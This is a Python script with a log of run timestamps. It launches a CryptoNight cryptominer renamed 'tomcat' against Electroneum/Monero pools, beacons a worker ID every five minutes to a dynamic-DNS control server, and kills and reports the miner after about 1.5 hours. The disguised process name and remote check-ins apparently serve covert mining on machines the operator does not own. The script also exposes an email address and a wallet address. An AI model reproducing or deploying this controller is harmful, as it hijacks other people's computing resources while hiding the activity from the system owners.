import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:01.537260
#2018-02-17 17:34:07.619935
#2018-02-17 19:22:06.178195
#2018-02-17 21:11:06.197141
#2018-02-17 22:55:08.900521
#2018-02-18 00:41:04.577751
#2018-02-18 02:30:10.230283
#2018-02-18 04:18:06.270358
#2018-02-18 06:09:05.664742
#2018-02-18 07:58:05.558883
#2018-02-18 09:45:06.454546
#2018-02-18 11:33:06.333768
#2018-02-18 13:19:05.100784
#2018-02-18 15:09:06.397885
#2018-02-18 16:57:05.212421
#2018-02-18 18:44:03.878638
#2018-02-18 20:32:05.067980
#2018-02-18 22:18:05.086721
#2018-02-19 00:07:03.968084
#2018-02-19 01:53:05.392735
#2018-02-19 03:40:01.760058
#2018-02-19 05:25:06.385776
#2018-02-19 07:12:07.774495
#2018-02-19 09:01:05.601632
#2018-02-19 10:49:01.237940
#2018-02-19 12:37:01.299585
#2018-02-19 14:24:09.837015
#2018-02-19 16:14:01.367231
#2018-02-19 18:01:04.344503
#2018-02-19 19:49:07.443666
#2018-02-19 21:36:06.938117
#2018-02-19 23:21:03.959658
#2018-02-20 01:07:01.591466
#2018-02-20 02:55:04.110511
#2018-02-20 04:42:07.128180
#2018-02-20 06:26:08.052667
#2018-02-20 08:11:04.176866
#2018-02-20 09:56:08.961213
#2018-02-20 11:39:04.799377
#2018-02-20 13:26:04.855401
#2018-02-20 15:11:01.562437
#2018-02-20 16:56:01.403170
#2018-02-20 18:43:08.933375
#2018-02-20 20:34:03.206497
#2018-02-20 22:18:01.739005
#2018-02-20 23:58:02.100582
#2018-02-21 01:44:06.338519
#2018-02-21 03:33:02.068656
#2018-02-21 05:21:06.472760
#2018-02-21 07:09:04.781201
#2018-02-21 08:56:05.364281
#2018-02-21 10:43:06.726815
#2018-02-21 12:31:09.378707
#2018-02-21 14:17:07.741819
#2018-02-21 16:04:05.380397
#2018-02-21 17:54:08.747812
#2018-02-21 19:41:06.347025
#2018-02-21 21:28:06.944435
#2018-02-21 23:14:06.891771
#2018-02-22 01:04:04.181772
#2018-02-22 02:51:01.358671
#2018-02-22 04:37:04.891948
#2018-02-22 06:23:08.301624
#2018-02-22 08:12:04.202312
#2018-02-22 10:01:05.445972
#2018-02-22 11:46:01.665235
#2018-02-22 13:31:08.401756
#2018-02-22 15:19:07.782566
#2018-02-22 17:06:03.207398
#2018-02-22 18:52:05.537063
#2018-02-22 20:45:07.433678
#2018-02-22 22:32:04.970840
#2018-02-23 01:16:04.292098
#2018-02-23 03:02:05.382265
#2018-02-23 04:47:04.220560
#2018-02-23 06:35:07.265040
#2018-02-23 08:23:04.037138
#2018-02-23 10:39:01.356323
#2018-02-23 12:32:08.561547
#2018-02-23 14:20:08.125573
#2018-02-23 16:11:01.618092
#2018-02-23 17:55:09.306470
#2018-02-23 19:40:01.651640
#2018-02-23 21:22:05.112895
#2018-02-23 23:10:04.113381
#2018-02-24 00:55:06.776787
#2018-02-24 02:49:07.151555
#2018-02-24 04:38:05.334874
#2018-02-24 06:22:01.872171
#2018-02-24 08:10:06.208677
#2018-02-24 09:54:06.679922
#2018-02-24 11:49:05.217475
#2018-02-24 13:41:01.737009
#2018-02-24 15:27:07.167894
#2018-02-24 17:16:06.797696
#2018-02-24 19:09:05.351318
#2018-02-24 20:57:06.531259
#2018-02-24 23:25:05.613661
#2018-02-25 03:48:03.958453
#2018-02-25 07:33:02.039475